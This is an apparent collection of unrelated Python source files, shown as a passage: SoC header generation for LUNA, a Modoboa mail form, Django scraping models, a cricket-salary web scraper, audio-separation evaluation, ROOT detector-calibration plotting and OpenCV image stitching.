function. This can be used to generate file content instead of printing to the terminal.
"""
def emit(content):
""" Utility function that emits a string to the targeted file. """
print(content, file=file)
# Create a mapping that maps our register sizes to C types.
types_for_size = {
4: 'uint32_t',
2: 'uint16_t',
1: 'uint8_t'
}
# Emit a warning header.
emit("/*")
emit(" * Automatically generated by LUNA; edits will be discarded on rebuild.")
emit(" * (Most header files phrase this 'Do not edit.'; be warned accordingly.)")
emit(" *")
emit(f" * Generated: {datetime.datetime.now()}.")
emit(" */")
emit("\n")
emit(f"#ifndef __{macro_name}_H__")
emit(f"#define __{macro_name}_H__")
emit("")
emit("#include <stdint.h>\n")
emit("#include <stdbool.h>")
emit("")
emit("//")
emit("// Environment Information")
emit("//")
emit("")
emit(f"#define PLATFORM_NAME \"{platform_name}\"")
emit("")
# Emit our constant data for all Minerva CPUs.
self._emit_minerva_basics(emit)
emit("//")
emit("// Peripherals")
emit("//")
for memory_map, resource, address, size in self.resources():
# Get peripheral name
if memory_map.name is None:
name = resource.name
else:
name = "{}_{}".format(memory_map.name, resource.name)
# Always generate a macro for the resource's ADDRESS and size.
emit(f"#define {name.upper()}_ADDRESS (0x{address:08x}U)")
emit(f"#define {name.upper()}_SIZE ({size})")
# If we have information on how to access this resource, generate convenience
# macros for reading and writing it.
if hasattr(resource, 'access'):
c_type = types_for_size[size]
# Generate a read stub, if useful...
if resource.access.readable():
emit(f"static inline {c_type} {name}_read(void) {{")
emit(f" volatile {c_type} *reg = ({c_type} *){name.upper()}_ADDRESS;")
emit(f" return *reg;")
emit(f"}}")
# ... and a write stub.
if resource.access.writable():
emit(f"static inline void {name}_write({c_type} value) {{")
emit(f" volatile {c_type} *reg = ({c_type} *){name.upper()}_ADDRESS;")
emit(f" *reg = value;")
emit(f"}}")
emit("")
emit("//")
emit("// Interrupts")
emit("//")
for irq, peripheral in self._irqs.items():
# Function that determines if a given unit has an IRQ pending.
emit(f"static inline bool {peripheral.name}_interrupt_pending(void) {{")
emit(f" return pending_irqs() & (1 << {irq});")
emit(f"}}")
# IRQ masking
emit(f"static inline void {peripheral.name}_interrupt_enable(void) {{")
emit(f" irq_setmask(irq_getmask() | (1 << {irq}));")
emit(f"}}")
emit(f"static inline void {peripheral.name}_interrupt_disable(void) {{")
emit(f" irq_setmask(irq_getmask() & ~(1 << {irq}));")
emit(f"}}")
emit("#endif")
emit("")
def generate_ld_script(self, file=None):
""" Generates an ldscript that holds our primary RAM and ROM regions.
Parameters:
file -- Optional. If provided, this will be treated as the file= argument to the print()
function. This can be used to generate file content instead of printing to the terminal.
"""
def emit(content):
""" Utility function that emits a string to the targeted file. """
print(content, file=file)
# Insert our automatically generated header.
emit("/**")
emit(" * Linker memory regions.")
emit(" *")
emit(" * Automatically generated by LUNA; edits will be discarded on rebuild.")
emit(" * (Most header files phrase this 'Do not edit.'; be warned accordingly.)")
emit(" *")
emit(f" * Generated: {datetime.datetime.now()}.")
emit(" */")
emit("")
emit("MEMORY")
emit("{")
# Add regions for our main ROM and our main RAM.
for memory in [self.bootrom, self._main_ram]:
# Figure out our fields: a region name, our start, and our size.
name = "ram" if (memory is self._main_ram) else "rom"
start, size = self._range_for_peripheral(memory)
if size:
emit(f" {name} : ORIGIN = 0x{start:08x}, LENGTH = 0x{size:08x}")
emit("}")
emit("")
def log_resources(self):
""" Logs a summary of our resource utilization to our running logs. """
# Resource addresses:
logging.info("Physical address allocations:")
memory_map = self.bus_decoder.bus.memory_map
for resource_info in memory_map.all_resources():
start = resource_info.start
end = resource_info.end
peripheral = resource_info.resource
logging.info(f" {start:08x}-{end:08x}: {peripheral}")
logging.info("")
# IRQ numbers
logging.info("IRQ allocations:")
for irq, peripheral in self._irqs.items():
logging.info(f" {irq}: {peripheral.name}")
logging.info("")
# Main memory.
if self._build_bios:
memory_location = self.main_ram_address()
logging.info(f"Main memory at 0x{memory_location:08x}; upload using:")
logging.info(f" flterm --kernel <your_firmware> --kernel-addr 0x{memory_location:08x} --speed {self._uart_baud}")
logging.info("or")
logging.info(f" lxterm --kernel <your_firmware> --kernel-adr 0x{memory_location:08x} --speed {self._uart_baud}")
logging.info("")
def main_ram_address(self):
""" Returns the address of the main system RAM. """
start, _ = self._range_for_peripheral(self._main_ram)
return start
|
"""Postfix relay domains extension forms."""
from django.db.models.signals import pre_save, post_save
from modoboa.lib.form_utils import WizardStep
from modoboa.transport import forms as tr_forms, models as tr_models
class DisableSignals(object):
"""Context manager to disable signals."""
def __init__(self):
self.stashed_signals = {}
self.disabled_signals = [pre_save, post_save]
def __enter__(self):
for signal in self.disabled_signals:
self.disconnect(signal)
def __exit__(self, exc_type, exc_val, exc_tb):
for signal in list(self.stashed_signals.keys()):
self.reconnect(signal)
def disconnect(self, signal):
self.stashed_signals[signal] = signal.receivers
signal.receivers = []
def reconnect(self, signal):
signal.receivers = self.stashed_signals.get(signal, [])
del self.stashed_signals[signal]
class RelayDomainWizardStep(WizardStep):
"""A custom wizard step."""
def check_access(self, wizard):
"""Check if domain is a relay domain."""
return wizard.steps[0].form.cleaned_data["type"] == "relaydomain"
class RelayDomainFormGeneral(tr_forms.TransportForm):
"""A form to display transport."""
class Meta:
model = tr_models.Transport
exclude = [
"creation", "pattern", "next_hop", "enabled",
"_settings"
]
def save(self, *args, **kwargs):
"""Custom save method."""
domain = kwargs.pop("domain", None)
if domain.type != "relaydomain":
# We don't want to recreate the transport we just deleted it
# (post_save signal).
return None
instance = super(RelayDomainFormGeneral, self).save()
instance.pattern = domain.name
instance.save()
if not domain.transport:
domain.transport = instance
with DisableSignals():
domain.save(update_fields=["transport"])
return instance
|
# parent class for battle options
class BattleOptions:
def __init__(self, name, fighter, targets):
self.name = name
self.fighter = fighter
self.targets = targets
def generate_round_actions(self):
return
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import django
from django.db import models
# Create your models here.
from django.db.models.base import Model
MANAGED = True
class ScrapModel(models.Model):
name = models.TextField()
source = models.CharField(max_length=100, null=False, default='FlipKey')
created_date = models.DateField(default=django.utils.timezone.now)
@property
def count_has_numbers(self):
return self.scrap_model.filter(phone__isnull=False).count()
@property
def count_all(self):
return self.scrap_model.all().count()
def __unicode__(self):
return self.name
def __str__(self):
return self.name
class Meta:
managed = MANAGED
db_table = 'scrap_model'
class ScrapDetails(models.Model):
scrap = models.ForeignKey(ScrapModel, models.CASCADE, related_name='scrap_model', db_column='scrap_mode_id')
name = models.CharField(max_length=150, null=True)
f_name = models.CharField(max_length=150, null=True)
l_name = models.CharField(max_length=150, null=True)
phone = models.CharField(max_length=150, null=True)
url = models.URLField()
def __unicode__(self):
return self.name
def __str__(self):
return self.name
class Meta:
managed = MANAGED
db_table = 'scrap_details'
class SalesForce(models.Model):
sales_force_id = models.IntegerField()
sales_force_phone = models.CharField(max_length=250,db_index=True)
class Meta:
managed = MANAGED
db_table = 'sales_force'
|
from django import http
def test_view(request):
return http.HttpResponse()
|
import pandas as pd
from selenium import webdriver
driver = webdriver.Firefox(executable_path='C:\\Program Files\\Mozilla Firefox\\geckodriver-v0.29.0-win64\\geckodriver.exe')
import json
import time
team_links = list()
for year in range(2008,2021):
driver.get(f'https://moneyball.insidesport.co/teams.php?section={year}')
team_links.extend([link.find_element_by_tag_name('a').get_attribute('href') for link in driver.find_elements_by_class_name('logo-team')])
def teamYearStats(link):
driver.get(link)
time.sleep(3)
try:
players = driver.find_elements_by_class_name('info-player')
pl_list = list()
for pl in players:
player = dict()
player['jersey_no'] = pl.find_element_by_class_name('number-player').text
player['name'] = pl.find_element_by_tag_name('h4').find_element_by_tag_name('a').text.split('\n')[0].strip()
player['role'] = pl.find_element_by_tag_name('h4').find_elements_by_tag_name('span')[0].text
player['salary_rank'] = pl.find_element_by_tag_name('h4').find_elements_by_tag_name('span')[1].text.split(':')[1].strip()
player['salary'] = pl.find_elements_by_tag_name('li')[1].text.split('\n')[1].strip()[2:]
player['team'] = driver.find_element_by_tag_name('h1').text.title()
player['season'] = link[-4:]
pl_list.append(player)
return pl_list
except Exception as e:
print('Error in scraping player details for-', str(e),link.split('?')[1])
return None
output = list()
i = 0
for team in team_links:
i += 1
res = teamYearStats(team)
if res:
output.extend(res)
print(i)
cols = list(output[0].keys())
df = pd.DataFrame(output, columns=cols)
df.to_csv('player_salaries.csv', index=True)
|
import math
A=int(input("A= "))
B=int(input("B= "))
C=int(input("C= "))
Number_squares=int(int(A/C)*int(B/C))
Unused_part=int(int(A*B)-int(Number_squares*pow(C,2)))
print(Number_squares)
print(Unused_part)
|
def result(num):
if num < 100:
return num
cnt = 99
for n in range(100, num+1):
digits = [int(digit) for digit in str(n)]
if (digits[0] - digits[1]) == (digits[1] - digits[2]):
cnt += 1
return cnt
N = int(input())
print(result(N))
|
import util
import network
from librosa.util import find_files
from librosa.core import load,stft
import os.path
import const as C
import numpy as np
from pesq import pesq
from time import time
start = time()
PATH_MIR = C.PATH_EVAL
audiolist = find_files(PATH_MIR, ext="wav")
total_len = 0
gnsdr = gsir = gsar = np.zeros(2)
gpesq_inst = gpesq_vocal = 0
checkpoint = "checkpoints\checkpoint_54.model"
#checkpoint = "models\ck20200501UNET_34ep(Hop256).model"
i = 0
alpha = C.ALPHA
for audiofile in audiolist:
i = i + 1
if audiofile == audiolist[i-2]:
continue
fname = os.path.split(audiofile)[-1]
y, _ = load(audiofile, sr=None, mono=False)
inst = y[0, :]
mix = y[0, :] + y[1, :]
vocal = y[1, :]
#reconstruct predicted wave
mix_mag, mix_phase, mix_spec = util.LoadAudio(os.path.join(PATH_MIR,fname))
vocal_mag = np.abs(stft(vocal, n_fft=C.FFT_SIZE,hop_length=C.H,win_length=C.WIN_LENGTH).astype(np.float32))
vocal_mag /= np.max(vocal_mag)
inst_mag = np.abs(stft(inst, n_fft=C.FFT_SIZE,hop_length=C.H,win_length=C.WIN_LENGTH).astype(np.float32))
inst_mag /= np.max(inst_mag)
vocal_pred_spec = util.ComputeMask(mix_mag, mix_spec, alpha, unet_model=checkpoint, hard=False) #load model from checkpoints, in order to get t-f mask
inst_pred_spec = mix_spec - vocal_pred_spec
vocal_pred,len_cropped = util.SaveAudio("vocal-%s" % fname, vocal_pred_spec,vocal.shape[0])
inst_pred,_ = util.SaveAudio("inst-%s" % fname, inst_pred_spec,vocal.shape[0])
vocal_pred = vocal_pred * 100
inst_pred = inst_pred * 100
spec_cropped = min(vocal_mag.shape[1],vocal_pred_spec.shape[1])
#util.plot_spec(mix_mag[:,:spec_cropped],fname,datatype = 'mix')
#util.plot_spec(np.abs(vocal_pred_spec)[:,:spec_cropped],fname,datatype = 'vocal_predicted')
#util.plot_spec(np.abs(inst_pred_spec)[:,:spec_cropped],fname,datatype = 'inst_predicted')
#util.plot_spec(vocal_mag[:,:spec_cropped],fname,datatype = 'vocal_pure')
#util.plot_spec(inst_mag[:,:spec_cropped],fname,datatype = 'inst_pure')
# compute metrics, including SAR, SIR, NSDR, PESQ for both vocal and instrument
vocal = vocal[ :len_cropped]
inst = inst[ :len_cropped]
mix = mix[ :len_cropped]
#util.plot_wav(vocal_pred,fname,datatype = 'vocal_predicted')
#util.plot_wav(vocal,fname,datatype = 'vocal_pure')
#util.plot_wav(mix,fname,datatype = 'mix')
nsdr, sir, sar, pesq_inst, pesq_vocal = util.metrics(mix, inst, vocal, inst_pred, vocal_pred)
print(fname,pesq_vocal)
input()
total_len = total_len + len_cropped
gpesq_inst = gpesq_inst + len_cropped * pesq_inst
gpesq_vocal = gpesq_vocal + len_cropped * pesq_vocal
gnsdr = gnsdr + len_cropped * nsdr
gsir = gsir + len_cropped * sir
gsar = gsar + len_cropped * sar
#print('number of parameters:{}'.format(num_para))
gpesq_inst = gpesq_inst / total_len
gpesq_vocal = gpesq_vocal / total_len
gnsdr = gnsdr / total_len
gsir = gsir / total_len
gsar = gsar / total_len
end = time()
print("duration:{}".format(end - start))
print(checkpoint)
print("alpha:{}".format(alpha))
print("window_length:{}".format(C.WIN_LENGTH))
print("hop_length:{}".format(C.H))
print("PESQ_inst:{}\n PESQ_vocal:{}\n NSDR:{}\n SIR:{}\n SAR:{}".format(gpesq_inst, gpesq_vocal, gnsdr,gsir,gsar))
|
#! /usr/bin/env python
#import pdb
#pdb.set_trace()
import json
import urllib2
import argparse
import sys
username = ''
CLIENT_ID='f9387851ff8001b7abacd24a73fe1044'
def get_user_id(username, username_url):
"""
Get user id from username.
"""
try:
user_obj = urllib2.urlopen(username_url)
user_data = json.load(user_obj)
user_id = user_data['id']
except:
print "username invalid"
sys.exit(0)
return user_id
def get_user_info(username):
pass
def main():
parser = argparse.ArgumentParser(description='\
A sample program to grab user data from soundcloud')
parser.add_argument('-u', action='store',
dest='username',
help='Store the username')
results = parser.parse_args()
username = results.username
#pdb.set_trace()
#print username
username_url = 'http://api.soundcloud.com/users/'+username+'.json?client_id='+CLIENT_ID
api_loc='http://api.soundcloud.com/users/'\
+str(get_user_id(username, username_url))+'\
/playlists/?client_id='+CLIENT_ID
#print get_user_id(username, username_url)
#print api_loc
#print username_url
#print get_user_id(username)
try:
json_obj = urllib2.urlopen(api_loc)
data = json.load(json_obj)
print data
#print len(data)
#print len(data)
#print (str(id(data)))
except:
print "username inresolved ... !!"
sys.exit(0)
# with open(str(username)+'.json', 'a') as f:
# for item in data:
# f.write("%s" % item)
# for i in item:
# print(i, item[i])
if __name__=="__main__":main()
|
# Plot Laser Runs
from ROOT import *
from plotDictionary import sipmDict, pindiodeDict, shuntSipms, shuntPindiodes
from ADCConverter import ADCConverter
import os
import mapping
from argparse import ArgumentParser
from array import array
def plotData(file1, file2, ch, type, runDir, plotDir, shunts):
# Batch Mode removes X-forwarding for canvas creation graphics
# This makes everything MUCH faster!
gROOT.SetBatch()
# Setup file names
if shunts:
saveFile = file2.split(".root")[0]
else:
saveFile = file2.split("bright/")[1]
saveFile = saveFile.split(".root")[0]
plotLabel = saveFile + '_' + ch
# Get Histograms from files
F1 = TFile(runDir + file1)
F2 = TFile(runDir + file2)
H1 = F1.Get(ch)
H2 = F2.Get(ch)
H1.SetName("H1")
H2.SetName("H2")
# Formatting
H1.SetLineColor(kRed)
H1.SetLineStyle(2)
H2.SetLineColor(kBlue)
H2.GetXaxis().SetTitle("ADC")
H2.GetYaxis().SetTitle("Events")
H2.SetTitle(type + " Response to Laser inserted in CU")
# Make a canvas
C1 = TCanvas("c1","c1")
C1.SetLogy()
H2.Draw()
H1.Draw("same")
# Make a label
label = TText(0.2, 0.8, plotLabel)
label.SetTextFont(43)
label.SetTextSize(25)
label.SetTextAngle(0) # positive and negative angles are good!
label.SetNDC()
label.Draw()
# Make a legend
leg = TLegend(0.8,0.6,0.93,0.8)
leg.SetHeader("Legend")
if shunts:
leg.AddEntry("H1","Shunt 0")
leg.AddEntry("H2","Shunt 31")
else:
leg.AddEntry("H1","Dark")
leg.AddEntry("H2","Bright")
leg.Draw()
# Save
C1.Modified()
C1.Update()
C1.SaveAs(runDir + plotDir + plotLabel + '.pdf')
def makePlots(runDir, plotDir, dictionary, shunts):
#file1 = "dark/uhtr62-2_dark.root"
#file2 = "bright/uhtr62-2_rbx11_cu32_bright.root"
#for ch in xrange(144):
# plotData(file1, file2, 'h'+str(ch), runDir)
for d in dictionary:
file1 = d['file1']
file2 = d['file2']
chList = d['ch']
ch_type = d['type']
for ch in chList:
plotData(file1, file2, ch, ch_type, runDir, plotDir, shunts)
# Return maximum ADC value for a histogram (final nonzero bin)
# update to accept channel list and return a list of max values...
# this will be more efficient than opening the root file for each channel
def oldFindMaxADC(rootFile, ch, verb=False):
# Get Histogram from file
F = TFile(rootFile)
H = F.Get(ch)
# Find Max ADC
numZeros = 0 # Count number of consecutive bins with value 0
Bin = 0 # Bin index 0 to 255
limit = 10 # Return once numZeros > limit
while Bin < 256:
b = H.GetBinContent(Bin)
if verb:
print "Bin %-3i: %.3f" % (Bin, b)
if b == 0:
numZeros += 1
else:
numZeros = 0
if numZeros > limit:
if Bin == limit:
return 0
else:
return Bin - limit - 1
Bin += 1
return Bin - 1 # Return bin in 0 to 255 range
# New Find Max that starts at ADC 256 and looks for bin with value > 1
def findMaxADC(rootFile, ch, verb=False):
if verb:
print "file: %s channel: %s" % (rootFile, ch)
# Get Histogram from file
F = TFile(rootFile)
H = F.Get(ch)
# Find Max ADC
Bin = 255 # starting bin; bin index 0 to 255
passingBins = 0 # number of consecutive bins greater than cutoff
required = 2 # required number of consecutive bins greater than cutoff
cutoff = 1 # cutoff for accepting value in bin
while Bin > 0:
b = H.GetBinContent(Bin)
if verb:
print "Bin %-3i: %.3f" % (Bin, b)
if b > cutoff:
passingBins += 1
else:
passingBins = 0
if passingBins >= required:
# return first nonzero bin
maxBin = Bin + passingBins - 1
if verb:
print "Max Bin: %-3i" % maxBin
return maxBin
Bin -= 1
if verb:
print "Max Bin: %-3i" % Bin
return Bin # Return Bin = 0
def plotMax(runDir, dictionary):
gROOT.SetBatch()
maxADC = 256 + 16 * 4 # Max ADC from 0 to 256 with additional 64 to shift data to the left (makes room for labels)
nBins = maxADC / 16 # Number of bins is 320/16 = 20
H1 = TH1F("H1", "H1", nBins, 1, maxADC)
H2 = TH1F("H2", "H2", nBins, 1, maxADC)
for d in dictionary:
file1 = runDir + d['file1']
file2 = runDir + d['file2']
chList = d['ch']
ch_type = d['type']
for ch in chList:
for f in [file1, file2]:
maxBin = findMaxADC(f, ch, False)
#print "File: {0} | Channel: {1} | Max Bin: {2}".format(f, ch, maxBin)
if f == file1: # H1 and file1 are shunt 0
H1.Fill(maxBin)
if f == file2: # H2 and file2 are shunt 31
H2.Fill(maxBin)
print "Type: {0}".format(ch_type)
if ch_type == "SiPM":
maxY = 400
if ch_type == "Pindiode":
maxY = 20
# Formatting
H1.SetLineColor(kRed)
H1.SetLineStyle(2)
H1.SetAxisRange(0,maxY,"Y")
H2.SetLineColor(kBlue)
H2.GetXaxis().SetTitle("Max ADC")
H2.GetYaxis().SetTitle("No. " + ch_type)
H2.SetAxisRange(0,maxY,"Y")
H2.SetTitle("Max ADC Reached for " + ch_type)
# Make a canvas
C1 = TCanvas("c1","c1")
H2.Draw()
H1.Draw("same")
# Make a legend
leg = TLegend(0.8,0.6,0.93,0.8)
leg.SetHeader("Legend")
leg.AddEntry("H1","Shunt 0")
leg.AddEntry("H2","Shunt 31")
leg.Draw()
# Save
C1.Modified()
C1.Update()
C1.SaveAs(runDir + 'max_adc_' + ch_type + '.pdf')
# Table options are "sipm", "pd", and "pindiodes"
def makeTable(runDir, tables, runList, unit, stability=False):
if runDir[-1] != "/":
runDir += "/"
cuList = []
for directory in os.listdir(runDir):
if "CU" in directory:
cu = int(directory.split("CU_")[-1])
cuList.append(cu)
cuList.sort()
shuntList = [31]
pdList = list(i for i in xrange(6))
col_width = 10
adcConverter = ADCConverter(unit, 31) # unit and shunt
for table in tables:
cuBadChannels = {}
total_channels = 0
total_bad_channels = 0
print "Creating {0} table".format(table)
tfile = TFile(runDir + table + '.root', 'recreate')
tree = TTree('t1', 't1')
array_dict = {}
with open (runDir + table + "_array.h", 'w') as a:
with open (runDir + table + "_table.txt", 'w') as t:
if table == "sipm":
columns = ["cu", "rbx", "run", "rm", table + "_ch", "uhtr_ch", "shunt", "max_adc", "max_pc", "result"]
elif table == "pd":
columns = ["cu", "rbx", "run", table + "_ch", "uhtr_ch", "shunt", "max_adc", "max_pc", "result"]
for key in columns:
array_dict[key] = array('f', [ 0. ])
float_name = '{0}/F'.format(key)
tree.Branch(key, array_dict[key], float_name)
header_table = "".join(entry.ljust(col_width) for entry in columns) + "\n"
header_array = "{" + ",".join(columns) + "}\n"
t.write("# " + header_table)
#print header_table
array_string = ""
a.write("#include <vector>\n\n")
a.write("// " + header_array)
array_string += "std::vector< std::vector<double> > %s_array = {\n" % table
# Example Files
# new_cu_data/CU_15/rbx0_shunt31_pd_1.root
# new_cu_data/CU_15/rbx0_shunt31_uhtr1_1.root
# new_cu_data/CU_15/rbx0_shunt31_uhtr2_1.root
# order by cu, rbx, run, shunt, uHTR, rm, channel
for icu in cuList:
print "Processing CU {0}".format(icu)
# get RBX list from file names
rbxList = []
bad_channels = 0
for data_file in os.listdir(runDir + "CU_" + str(icu)):
if "rbx" in data_file and ".root" in data_file:
data_file = data_file.split("rbx")[-1]
data_file = data_file.split("_")[0]
rbx_int = int(data_file)
if rbx_int not in rbxList:
rbxList.append(rbx_int)
for irbx in rbxList:
for irun in runList:
for ishunt in shuntList:
RM = 0
for iuhtr in [1,2]:
if table == "pd" and iuhtr == 2:
continue #do not do pd twice
# It is important to only include SiPM / PD data in correct table
#if table == "sipm": iterFlag = "rbx%d_shunt%d_%d.root" % (irbx, ishunt, iuhtr)
#elif table == "pd": iterFlag = "rbx%d_shunt%d_pd.root" % (irbx, ishunt)
if table == "sipm": f = "%sCU_%d/rbx%d_shunt%d_uhtr%d_%d.root" % (runDir, icu, irbx, ishunt, iuhtr, irun)
elif table == "pd": f = "%sCU_%d/rbx%d_shunt%d_pd_%d.root" % (runDir, icu, irbx, ishunt, irun)
if not os.path.isfile(f):
continue # skip files that do not exist
#print "file: %s" % (f)
# RBX, CU and shunt are constant for one file
cu = "%d" % icu
run = "%d" % irun
rbx_full = "%02d" % irbx
rbx = "%d" % irbx
shunt = "%d" % ishunt
if shunt == "0": cutoff = 150
else: cutoff = 100
# RM, pindiode/sipm_ch, uHTR, uhtr_ch, max_adc will vary within a file
if table == "sipm":
chList = mapping.rbxSIPM[rbx_full][iuhtr-1]
elif table == "pd":
chList = mapping.rbxPD[rbx_full]
for i, channel in enumerate(chList):
# mask pin-diodes that do not have light
if stability:
if table == "pd":
if i > 1:
continue
else:
if table == "sipm":
if irun > 3:
continue
if table == "pd":
# runs 1, 2, and 3 are pin-diode chs 0, 1
if irun < 4:
if i > 1:
continue
# runs 4, 5, 6, and 7 are pin-diode chs 2, 3, 4, and 5
else:
if i != irun-2:
continue
rm_ch = str(i % 48)
pd_ch = str(i % 6)
if rm_ch == "0":
RM += 1
rm = "%d" % RM
# mask out 4 dark channels per RBX
# rbx0 has RM type 2 in slot 4 for stability run only!!!
masked_rm = rm
if masked_rm == "4":
masked_rm = "2"
if (masked_rm, rm_ch) in mapping.darkSipms:
#print "mask out channel: RM %s SiPM %s masked rm: %s" % (rm, rm_ch, masked_rm)
continue
uhtr_ch = channel.split("h")[-1]
max_adc = str(findMaxADC(f, channel, False))
max_charge = "%.2f" % adcConverter.linearize(max_adc)
total_channels += 1
if int(max_adc) >= cutoff:
result = "1"
else:
result = "0"
bad_channels += 1
total_bad_channels += 1
if table == "sipm":
row = [cu, rbx, run, rm, rm_ch, uhtr_ch, shunt, max_adc, max_charge, result]
if table == "pd":
row = [cu, rbx, run, pd_ch, uhtr_ch, shunt, max_adc, max_charge, result]
array_string += "{" + ", ".join(row) + "},\n"
row_string = "".join(entry.ljust(col_width) for entry in row)
t.write(row_string + "\n")
tree_string = ""
for i, key in enumerate(columns):
array_dict[key][0] = float(row[i])
tree_string += str(array_dict[key][0]) + " "
#print tree_string
tree.Fill()
#if result == "0":
# print row_string
if int(max_adc) > 240:
print row_string
# calibration unit lopp
cuBadChannels[icu] = bad_channels
# end of array
if array_string[-2:] == ",\n":
array_string = array_string[:-2] + "\n"
array_string += "};\n"
a.write(array_string)
# table loop
tfile.Write()
tfile.Close()
for c in sorted(cuBadChannels):
print "CU {0} : {1} {2} channels less than {3} ADC".format(c, cuBadChannels[c], table, cutoff)
print "Total: {0} {1} channels less than {2} ADC out of {3} total channels".format(total_bad_channels, table, cutoff, total_channels)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--directory", "-d", default="Nov17-18_Final_CU_Data", help="directory containing directories with CU data")
parser.add_argument("--unit", "-u", default="fc", help="Charge unit (fc, pc, nc).")
options = parser.parse_args()
runDir = options.directory
unit = options.unit
# sipm: iterations 1, 2, 3
# pd: iterations 1, 2, 3, 4, 5, 6, 7
tables = ["sipm", "pd"]
runList = [1,4,5,6,7]
makeTable(runDir, tables, runList, unit)
# iterations for stability runs: iteration 1 is bad for CU6
#tables = ["sipm", "pd"]
#runList = list(i for i in xrange(2,7))
#makeTable(runDir, tables, runList, unit, stability=True)
#findMaxADC("CU_8/rbx0_shunt31_pd_1.root", "h0", True)
#findMaxADC("CU_8/rbx0_shunt31_pd_1.root", "h1", True)
|
# References
# https://web.archive.org/web/20140115053733/http://cs.bath.ac.uk:80/brown/papers/ijcv2007.pdf
# https://github.com/linrl3/Image-Stitching-OpenCV/blob/master/Image_Stitching.py
# https://living-sun.com/pt/python/708914-how-do-you-compute-a-homography-given-two-poses-python-opencv-homography.html
# https://towardsdatascience.com/image-panorama-stitching-with-opencv-2402bde6b46c
# https://towardsdatascience.com/image-stitching-using-opencv-817779c86a83
import cv2
import numpy as np
from simple_cb import simplest_cb
# Algorithm options
SIFT = "SIFT"
SURF = "SURF"
ORB = "ORB"
BRISK = "BRISK"
# Color options
GRAY = "GRAY"
COLORED = "COLORED"
# Overlay options
OVERLAY_MASK = "mask"
OVERLAY_WEIGHTED = "weighted"
# Configs
RATIO_DISTANCE = 0.67
MIN_MATCHES = 50
EQUALIZE_HISTOGRAM = False
SHOW_IMG_STEPS = False
SHOW_IMG_STEPS_DELAY = 10000
MATCH_ALGORITHM = SURF
OVERLAY_TYPE = OVERLAY_WEIGHTED
COLOR_TYPE = COLORED
class Image:
UID = 0
def __init__(self, d):
if isinstance(d, str):
if COLOR_TYPE == COLORED:
self.img = cv2.imread(d, cv2.IMREAD_COLOR)
self.img = simplest_cb(self.img, 1)
else:
self.img = cv2.imread(d, cv2.IMREAD_GRAYSCALE)
else:
self.img = d
self.loaded = isinstance(d, str)
self.uid = Image.UID
Image.UID += 1
def __eq__(self, other):
if isinstance(other, Image):
return other.uid == self.uid
else:
return super(self).__eq__(other)
def equalize_bgr(img):
img_yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV)
img_yuv[:, :, 0] = cv2.equalizeHist(img_yuv[:, :, 0])
return cv2.cvtColor(img_yuv, cv2.COLOR_YUV2BGR)
def insert_border(imgs):
base_img = imgs[0]
height, width = base_img.img.shape[:2]
for img in imgs:
img.img = cv2.copyMakeBorder(img.img, height, height, width, width, cv2.BORDER_CONSTANT)
def remove_border(img):
if COLOR_TYPE == COLORED:
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
else:
gray = img
_, thresh = cv2.threshold(gray, 3, 255, cv2.THRESH_BINARY)
_, contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
x, y, w, h = cv2.boundingRect(contours[0])
new_img = [
layer[y:(y + h), x:(x + w)] for layer in cv2.split(img)
]
return cv2.merge(new_img)
def load_images(*args):
return [Image(img) for img in args]
def create_kp_describer_matcher(t):
assert t == SURF or t == SIFT or t == ORB or t == BRISK, "t param is invalid"
if SURF == t or SIFT == t:
if SURF == t:
kp_describer = cv2.xfeatures2d.SURF_create()
else:
kp_describer = cv2.xfeatures2d.SIFT_create()
index_params = {'algorithm': 0, 'trees': 5}
search_params = {'checks': 1000}
matcher = cv2.FlannBasedMatcher(index_params, search_params)
return kp_describer, matcher
elif ORB == t or BRISK == t:
if ORB == t:
kp_describer = cv2.ORB_create()
else:
kp_describer = cv2.BRISK_create()
matcher = cv2.BFMatcher(cv2.NORM_L2)
return kp_describer, matcher
def match_images(img1, img2, match_algorithm):
kp_describer, matcher = create_kp_describer_matcher(match_algorithm)
if EQUALIZE_HISTOGRAM:
img1 = equalize_bgr(img1)
img2 = equalize_bgr(img2)
kp1, des1 = kp_describer.detectAndCompute(img1, None)
kp2, des2 = kp_describer.detectAndCompute(img2, None)
raw_matches = matcher.knnMatch(des1, des2, k=2)
good_matches = []
for m1, m2 in raw_matches:
if m1.distance < RATIO_DISTANCE * m2.distance:
good_matches.append(m1)
return kp1, kp2, good_matches
def get_best_match(images, match_algorithm):
print(f'Processing best match in {len(images)} images')
# Not implemented. Gets the 2 first images
img1, img2 = images[0], images[1]
kp1, kp2, matchs = match_images(img1.img, img2.img, match_algorithm)
return img1, img2, kp1, kp2, matchs
# Below is a failed try to identify the best match pair
# best_image = {
# 'image_a': images[0],
# 'image_b': images[1],
# 'kp1': None,
# 'kp2': None,
# 'good_matches': []
# }
# for image_a in images:
# for image_b in images:
# if image_a != image_b:
# kp1, kp2, good_matches = match_images(image_a.img, image_b.img, match_algorithm)
# if len(good_matches) > len(best_image['good_matches']):
# best_image['good_matches'] = good_matches
# best_image['image_a'] = image_a
# best_image['image_b'] = image_b
# best_image['kp1'] = kp1
# best_image['kp2'] = kp2
#
# return best_image['image_a'], best_image['image_b'], best_image['kp1'], best_image['kp2'], best_image['good_matches']
def homograph(img1, kp1, img2, kp2, good_matches, min_matches, show_matching, idx):
print('Calculating homograph')
if show_matching:
good_matches_to_draw = [[p] for p in good_matches]
match_image = cv2.drawMatchesKnn(img1, kp1, img2, kp2, good_matches_to_draw, None, flags=2)
cv2.imshow(f'matching {idx}', match_image)
cv2.waitKey(SHOW_IMG_STEPS_DELAY)
if len(good_matches) >= min_matches:
img1_key_points = np.float32([kp1[m.queryIdx].pt for m in good_matches]).reshape(-1, 1, 2)
img2_key_points = np.float32([kp2[m.trainIdx].pt for m in good_matches]).reshape(-1, 1, 2)
return cv2.findHomography(img1_key_points, img2_key_points, cv2.RANSAC, 5.0)
return None, None
def panorama(imgs):
imgs = load_images(*imgs)
insert_border(imgs)
panorama_img = None
non_processed = [*imgs]
i = 0
while len(imgs) > 1:
print(f'{len(imgs)} images left')
i += 1
image1, image2, kp1, kp2, good_matches = get_best_match(imgs, MATCH_ALGORITHM)
imgs.remove(image1)
imgs.remove(image2)
img1 = image1.img
img2 = image2.img
# kp1, kp2, good_matches = match_images(img1, img2, MATCH_ALGORITHM)
